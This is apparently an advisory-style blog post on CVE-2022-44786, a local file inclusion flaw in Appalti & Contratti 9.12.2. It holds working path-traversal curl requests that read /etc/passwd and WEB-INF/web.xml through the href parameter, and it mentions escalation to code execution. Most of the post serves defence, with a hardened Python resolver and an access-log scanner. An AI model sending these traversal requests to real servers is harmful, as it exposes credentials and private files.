In late 2022, a critical security flaw was discovered in the Appalti & Contratti application, version 9.12.2. This vulnerability, tracked as CVE-2022-44786, is a Local File Inclusion (LFI) weakness that can let attackers read sensitive files off the server, sometimes leading to remote code execution.

This guide will walk you through what the flaw is, how it can be exploited, and what you should do about it.

What’s Appalti & Contratti?

Appalti & Contratti (A&C) is a widely-used Italian software for managing public tenders and contracts. Government offices and large organizations run this software to manage official paperwork online.

The Vulnerability: Local File Inclusion via href Parameter

The main problem lies in how the software handles the href parameter in HTTP requests (both POST and GET) to the /ApriPagina.do page. This parameter is meant to let the app pick which JSP (JavaServer Pages) file to render. But there’s no validation, so attackers can use it to make the server read *any* file it has access to.

In Simple Terms

If you control the href parameter, and the app just includes whatever filename you send, you might read secrets like /etc/passwd, server configs, or even app code.

Here’s a basic example using curl. Let’s say the app is running at

http://victim.site/AppaltiContratti/ApriPagina.do

Exploit a Local File Inclusion with a GET Request

GET /AppaltiContratti/ApriPagina.do?href=../../../../../../etc/passwd HTTP/1.1
Host: victim.site

Use curl from your terminal

curl "http://victim.site/AppaltiContratti/ApriPagina.do?href=../../../../../../etc/passwd"

Or with a POST Request

curl -X POST -d "href=../../../../../../etc/passwd" "http://victim.site/AppaltiContratti/ApriPagina.do"

If vulnerable, you’ll get the contents of /etc/passwd:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...

What Files Can Be Read?

The href parameter isn’t limited: you can try to grab anything readable by the web server user.

Examples

- /etc/passwd — Get a list of local users
- WEB-INF/web.xml — Read application configs
- /proc/self/environ — Leak environment variables (sometimes credentials!)
- Log files or source code

Danger: In some setups, you can use files like /proc/self/environ or logs to achieve *Remote Code Execution* if you can upload or inject web shells.

Real-World Exploit Example

Suppose the app runs as www-data. You can read PHP/Java configs, credentials, or private company data:

curl "http://victim.site/AppaltiContratti/ApriPagina.do?href=../../WEB-INF/web.xml"

Result (partial)

<web-app>
  ...
  <param-name>db.password</param-name>
  <param-value>SECRET_DB_PASSWORD</param-value>
  ...
</web-app>

Remediation Steps

1. Update: check the vendor’s site for a patched release and upgrade away from 9.12.2.
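Until the vendor patch is in place, the input-side fix is to stop treating href as a path at all. The snippet below is an added illustration written for this guide, not code from Appalti & Contratti or its vendor: it models the unvalidated lookup the page describes beside a hardened lookup that only accepts a bare page name from an allowlist and then double-checks that the resolved path still sits under the page directory. The PAGES_ROOT directory and the page names in ALLOWED_PAGES are assumptions chosen for the example; substitute the real deployment values.

```python
import posixpath
import re

# Hypothetical deployment directory holding the JSP pages (assumption, not the vendor's path).
PAGES_ROOT = "/var/lib/tomcat/webapps/AppaltiContratti/pages"

# Hypothetical allowlist of page names the application legitimately renders.
ALLOWED_PAGES = frozenset({"home.jsp", "bando.jsp", "contratto.jsp"})

# A page name is letters, digits, '_' or '-' followed by ".jsp": no slashes, no dots elsewhere.
SAFE_PAGE_NAME = re.compile(r"[A-Za-z0-9_-]+\.jsp")


def resolve_vulnerable(href: str) -> str:
    """Models the flawed behaviour: the parameter is joined onto the page
    directory with no checks, so '../' sequences walk out of it."""
    return posixpath.normpath(posixpath.join(PAGES_ROOT, href))


def resolve_hardened(href):
    """Return the path to render, or None if the value must be rejected.

    Validation runs on the value as the servlet container already decoded it;
    each check is cheap and the last one is defence in depth in case the
    allowlist is ever loosened."""
    if not href or "\x00" in href:
        return None                      # empty or null-byte-truncation attempt
    if not SAFE_PAGE_NAME.fullmatch(href):
        return None                      # anything with '/', '..' or odd chars
    if href not in ALLOWED_PAGES:
        return None                      # unknown page: refuse, do not guess
    candidate = posixpath.normpath(posixpath.join(PAGES_ROOT, href))
    if not candidate.startswith(PAGES_ROOT + "/"):
        return None                      # resolved outside the page directory
    return candidate


if __name__ == "__main__":
    for value in ("home.jsp", "../../../../../../etc/passwd", "../../WEB-INF/web.xml"):
        print(f"{value!r:40} vulnerable -> {resolve_vulnerable(value)}")
        print(f"{'':40} hardened   -> {resolve_hardened(value)}")
```

With six `..` segments the vulnerable resolver lands on /etc/passwd exactly as in the requests shown earlier, while the hardened resolver returns None for every traversal attempt and only ever hands back a path inside PAGES_ROOT. Logging the rejected value alongside the client address gives the audit trail the remediation advice below asks for.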

References & Further Reading

- CVE Details: CVE-2022-44786
- Exploit Database Listing
- OWASP Local File Inclusion
- Vendor Site for Appalti & Contratti

Final Words

CVE-2022-44786 isn’t just a theoretical risk. If your organization uses Appalti & Contratti 9.12.2, you need to patch immediately, restrict input, and audit your logs. Local File Inclusion is an old trick, but when left open, it can be devastating.

For defenders: regularly scan your apps, and never trust user input—even if it’s “just a filename.”
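Auditing the logs means looking for exactly the requests this guide shows. The scanner below is an added example for this page, not tooling from the vendor or from any scanner: it parses access-log lines in the common Apache/Tomcat format, picks out requests to ApriPagina.do, decodes the href value repeatedly (so single- and double-URL-encoded traversal is caught), and flags traversal, absolute paths and null bytes. The sample lines are constructed for the example. One caveat a defender should know: an access log records only the query string, so the POST variant of the attack leaves no href behind; the scanner reports those requests separately so you know to check request-body logging or a WAF for them.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample access-log lines (common log format); not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [21/Nov/2022:10:15:02 +0000] "GET /AppaltiContratti/ApriPagina.do?href=../../../../../../etc/passwd HTTP/1.1" 200 1423
203.0.113.5 - - [21/Nov/2022:10:15:09 +0000] "GET /AppaltiContratti/ApriPagina.do?href=..%252F..%252FWEB-INF%252Fweb.xml HTTP/1.1" 200 2210
198.51.100.7 - - [21/Nov/2022:10:16:30 +0000] "GET /AppaltiContratti/ApriPagina.do?href=home.jsp HTTP/1.1" 200 5120
198.51.100.7 - - [21/Nov/2022:10:17:01 +0000] "POST /AppaltiContratti/ApriPagina.do HTTP/1.1" 200 1423
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)$'
)


def fully_decode(value: str, max_rounds: int = 3) -> str:
    """Percent-decode until the value stops changing (bounded), so that
    '%252F' -> '%2F' -> '/' is seen the way the application would see it."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify_href(raw_href: str):
    """Return (decoded_value, reason) where reason is None for a benign value."""
    decoded = fully_decode(raw_href)
    if "\x00" in decoded:
        return decoded, "null_byte"
    if "../" in decoded or "..\\" in decoded:
        return decoded, "traversal"
    if decoded.startswith("/"):
        return decoded, "absolute_path"
    return decoded, None


def scan_access_log(log_text: str):
    """Scan log text and return a list of findings for the vulnerable endpoint."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                       # not a line in the expected format
        parts = urlsplit(m["target"])
        if not parts.path.endswith("/ApriPagina.do"):
            continue                       # other endpoints are out of scope here
        if m["method"] == "POST":
            # Parameters travel in the body, which the access log does not record.
            findings.append({"ip": m["ip"], "ts": m["ts"], "href": None,
                             "reason": "post_body_not_logged"})
            continue
        for raw in parse_qs(parts.query, keep_blank_values=True).get("href", []):
            decoded, reason = classify_href(raw)
            if reason:
                findings.append({"ip": m["ip"], "ts": m["ts"], "href": decoded,
                                 "reason": reason})
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f['ts']}  {f['ip']:15}  {f['reason']:22}  {f['href']}")
```

Run against the constructed sample, the scanner flags the plain and double-encoded traversal requests from 203.0.113.5, lets the legitimate home.jsp request through, and marks the POST as unverifiable from this log alone; a 200 status on a flagged line is the signal that the read succeeded and the incident needs follow-up.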

Timeline

Published on: 11/21/2022 23:15:00 UTC
Last modified on: 11/23/2022 16:02:00 UTC